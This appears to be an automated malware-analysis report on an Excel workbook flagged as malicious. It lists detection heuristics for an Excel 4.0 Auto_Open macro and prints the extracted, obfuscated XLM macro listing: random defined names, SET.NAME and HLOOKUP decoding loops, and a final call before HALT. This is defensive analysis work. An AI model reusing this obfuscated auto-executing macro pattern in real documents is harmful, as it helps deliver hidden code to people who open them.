MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6622 bytes |
SHA-256: c63661f5d83a5aec3a460824fbf9e71f945680271cecedd55f42a773d1087b43 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Pfla
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B176
' 0018 27 LABEL : Cell Value, String Constant - BaBdAtfUczGc len=0
' 0018 26 LABEL : Cell Value, String Constant - bRtbHmCYeCU len=0
' 0018 20 LABEL : Cell Value, String Constant - CMmXT len=0
' 0018 26 LABEL : Cell Value, String Constant - DZmxxZGMOgI len=0
' 0018 21 LABEL : Cell Value, String Constant - FnmwbC len=0
' 0018 25 LABEL : Cell Value, String Constant - HgnnopMHhf len=0
' 0018 21 LABEL : Cell Value, String Constant - HqKhqY len=0
' 0018 27 LABEL : Cell Value, String Constant - KhYMGQKwUTrn len=0
' 0018 20 LABEL : Cell Value, String Constant - lFwXN len=0
' 0018 25 LABEL : Cell Value, String Constant - NbsvaJGEXH len=0
' 0018 22 LABEL : Cell Value, String Constant - RtmtPSM len=0
' 0018 24 LABEL : Cell Value, String Constant - SHqnuisIl len=0
' 0018 22 LABEL : Cell Value, String Constant - SZUSsDE len=0
' 0018 26 LABEL : Cell Value, String Constant - ThDNXdMthHD len=0
' 0018 26 LABEL : Cell Value, String Constant - TmNIlvjeeGG len=0
' 0018 27 LABEL : Cell Value, String Constant - VbazTtSiaXow len=0
' 0018 26 LABEL : Cell Value, String Constant - VnYUcgFQXyo len=0
' 0018 23 LABEL : Cell Value, String Constant - wOEGteOy len=0
' 0018 25 LABEL : Cell Value, String Constant - YSIiIQutRN len=0
' 0018 23 LABEL : Cell Value, String Constant - ZtlRsGGG len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' Pfla,Q41,"",854.00000000000000000000
' Pfla,Q42,"",-463.00000000000000000000
' Pfla,Q43,"",-674.00000000000000000000
' Pfla,Q44,"",3.00000000000000000000
' Pfla,Q45,"",-962.00000000000000000000
' Pfla,Q46,"",-351.00000000000000000000
' Pfla,B92,"SET.NAME("ThDNXdMthHD",0+VALUE("0"))",""
' Pfla,B96,"SET.NAME("FnmwbC",ThDNXdMthHD)",""
' Pfla,B99,"SET.NAME("HgnnopMHhf",ThDNXdMthHD)",""
' Pfla,B102,"SET.NAME("ZtlRsGGG",COUNTA(SHqnuisIl))",""
' Pfla,B105,"SET.NAME("KhYMGQKwUTrn",COUNTA(HqKhqY))",""
' Pfla,B108,[],""
' Pfla,B110,"SET.NAME("VnYUcgFQXyo","")",""
' Pfla,B113,"FnmwbC",""
' Pfla,B116,"SET.NAME("SZUSsDE",HLOOKUP("*",SHqnuisIl,FnmwbC,FALSE))",""
' Pfla,B121,"TmNIlvjeeGG",""
' Pfla,B125,"SET.NAME("RtmtPSM",ThDNXdMthHD)",""
' Pfla,B127,[],""
' Pfla,B129,"RtmtPSM",""
' Pfla,B132,"wOEGteOy",""
' Pfla,B136,"YSIiIQutRN",""
' Pfla,B138,"bRtbHmCYeCU",""
' Pfla,B142,"SET.NAME("lFwXN",VALUE(HLOOKUP("*",HqKhqY,bRtbHmCYeCU,FALSE)))",""
' Pfla,B144,"NbsvaJGEXH",""
' Pfla,B149,"VnYUcgFQXyo",""
' Pfla,B154,"HgnnopMHhf",""
' Pfla,B156,NEXT(),""
' Pfla,B159,"BaBdAtfUczGc",""
' Pfla,B162,[],""
' Pfla,B165,"CMmXT",""
' Pfla,B167,NEXT(),""
' Pfla,B172,RETURN(),""
' Pfla,B205,"SET.NAME("DZmxxZGMOgI",B92)",""
' Pfla,B208,"SHqnuisIl",""
' Pfla,B212,"SET.NAME("HqKhqY",R80C15)",""
' Pfla,B217,"SET.NAME("CMmXT",223)",""
' Pfla,B220,"SET.NAME("VbazTtSiaXow",2)",""
' Pfla,B222,DZmxxZGMOgI(),""
' Pfla,B223,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.